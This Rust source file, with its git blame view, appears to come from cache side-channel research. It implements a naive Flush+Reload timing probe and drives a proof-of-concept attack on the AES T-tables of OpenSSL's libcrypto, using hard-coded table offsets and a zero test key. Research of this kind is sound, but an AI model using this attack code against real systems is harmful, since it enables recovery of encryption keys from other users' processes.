dendrobates-t-azureus/aes-t-tables/src/main.rs

use aes_t_tables::{
    attack_t_tables_poc, AESTTableParams, CacheStatus, ChannelFatalError, SideChannelError,
    SingleAddrCacheSideChannel,
};
use cache_utils::calibration::only_reload;
use cache_utils::{flush, rdtsc_fence};
use std::collections::{HashMap, HashSet};
use std::path::Path;

#[derive(Debug)]
struct NaiveFlushAndReload {
    pub threshold: u64,
    current: Option<*const u8>,
}

impl NaiveFlushAndReload {
    fn from_threshold(threshold: u64) -> Self {
        NaiveFlushAndReload {
            threshold,
            current: None,
        }
    }
}

impl SingleAddrCacheSideChannel for NaiveFlushAndReload {
    fn test(&mut self, addr: *const u8) -> Result<CacheStatus, SideChannelError> {
        if self.current != Some(addr) {
            panic!(); // FIXME
        }
        let t = unsafe { only_reload(addr) };
        if t > self.threshold {
            Ok(CacheStatus::Miss)
        } else {
            Ok(CacheStatus::Hit)
        }
    }

    fn victim(&mut self, operation: &dyn Fn()) {
        operation()
    }

    fn calibrate(
        &mut self,
        _addresses: impl IntoIterator<Item = *const u8>,
    ) -> Result<(), ChannelFatalError> {
        Ok(())
    }

    fn prepare(&mut self, addr: *const u8) {
        unsafe { flush(addr) };
        self.current = Some(addr);
    }
}

type VPN = usize;
type Slice = u8;

struct FlushAndFlush {
    thresholds: HashMap<VPN, HashMap<Slice, u64>>,
    addresses_ready: HashSet<*const u8>,
}

impl FlushAndFlush {}

fn main() {
    let open_sslpath = Path::new(env!("OPENSSL_DIR")).join("lib/libcrypto.so");
    let mut side_channel = NaiveFlushAndReload::from_threshold(200);
    attack_t_tables_poc(
        &mut side_channel,
        AESTTableParams {
            num_encryptions: 1 << 14,
            key: [0; 32],
            te: [0x1b5d40, 0x1b5940, 0x1b5540, 0x1b5140], // adjust me (should be in decreasing order)
            openssl_path: &open_sslpath,
        },
    );
}
First version of aes T table attack - using flush and reload naively 2020-08-19 10:07:48 +02:00			`use aes_t_tables::{`
Get the foundation for optimized version using Flush and Flush 2020-08-19 14:34:52 +02:00			`attack_t_tables_poc, AESTTableParams, CacheStatus, ChannelFatalError, SideChannelError,`
			`SingleAddrCacheSideChannel,`
First version of aes T table attack - using flush and reload naively 2020-08-19 10:07:48 +02:00			`};`
			`use cache_utils::calibration::only_reload;`
			`use cache_utils::{flush, rdtsc_fence};`
Get the foundation for optimized version using Flush and Flush 2020-08-19 14:34:52 +02:00			`use std::collections::{HashMap, HashSet};`
First version of aes T table attack - using flush and reload naively 2020-08-19 10:07:48 +02:00			`use std::path::Path;`

			`#[derive(Debug)]`
			`struct NaiveFlushAndReload {`
			`pub threshold: u64,`
			`current: Option<*const u8>,`
			`}`

			`impl NaiveFlushAndReload {`
			`fn from_threshold(threshold: u64) -> Self {`
			`NaiveFlushAndReload {`
			`threshold,`
			`current: None,`
			`}`
			`}`
			`}`

			`impl SingleAddrCacheSideChannel for NaiveFlushAndReload {`
Get the foundation for optimized version using Flush and Flush 2020-08-19 14:34:52 +02:00			`fn test(&mut self, addr: *const u8) -> Result<CacheStatus, SideChannelError> {`
First version of aes T table attack - using flush and reload naively 2020-08-19 10:07:48 +02:00			`if self.current != Some(addr) {`
			`panic!(); // FIXME`
			`}`
			`let t = unsafe { only_reload(addr) };`
			`if t > self.threshold {`
			`Ok(CacheStatus::Miss)`
			`} else {`
			`Ok(CacheStatus::Hit)`
			`}`
			`}`

			`fn victim(&mut self, operation: &dyn Fn()) {`
			`operation()`
			`}`

			`fn calibrate(`
			`&mut self,`
			`_addresses: impl IntoIterator<Item = *const u8>,`
Get the foundation for optimized version using Flush and Flush 2020-08-19 14:34:52 +02:00			`) -> Result<(), ChannelFatalError> {`
First version of aes T table attack - using flush and reload naively 2020-08-19 10:07:48 +02:00			`Ok(())`
			`}`

			`fn prepare(&mut self, addr: *const u8) {`
			`unsafe { flush(addr) };`
			`self.current = Some(addr);`
			`}`
			`}`

Get the foundation for optimized version using Flush and Flush 2020-08-19 14:34:52 +02:00			`type VPN = usize;`
			`type Slice = u8;`

			`struct FlushAndFlush {`
			`thresholds: HashMap<VPN, HashMap<Slice, u64>>,`
			`addresses_ready: HashSet<*const u8>,`
			`}`

			`impl FlushAndFlush {}`

Add missing files 2020-08-04 14:42:17 +02:00			`fn main() {`
First version of aes T table attack - using flush and reload naively 2020-08-19 10:07:48 +02:00			`let open_sslpath = Path::new(env!("OPENSSL_DIR")).join("lib/libcrypto.so");`
			`let mut side_channel = NaiveFlushAndReload::from_threshold(200);`
			`attack_t_tables_poc(`
			`&mut side_channel,`
			`AESTTableParams {`
Get the foundation for optimized version using Flush and Flush 2020-08-19 14:34:52 +02:00			`num_encryptions: 1 << 14,`
First version of aes T table attack - using flush and reload naively 2020-08-19 10:07:48 +02:00			`key: [0; 32],`
			`te: [0x1b5d40, 0x1b5940, 0x1b5540, 0x1b5140], // adjust me (should be in decreasing order)`
			`openssl_path: &open_sslpath,`
			`},`
			`);`
Add missing files 2020-08-04 14:42:17 +02:00			`}`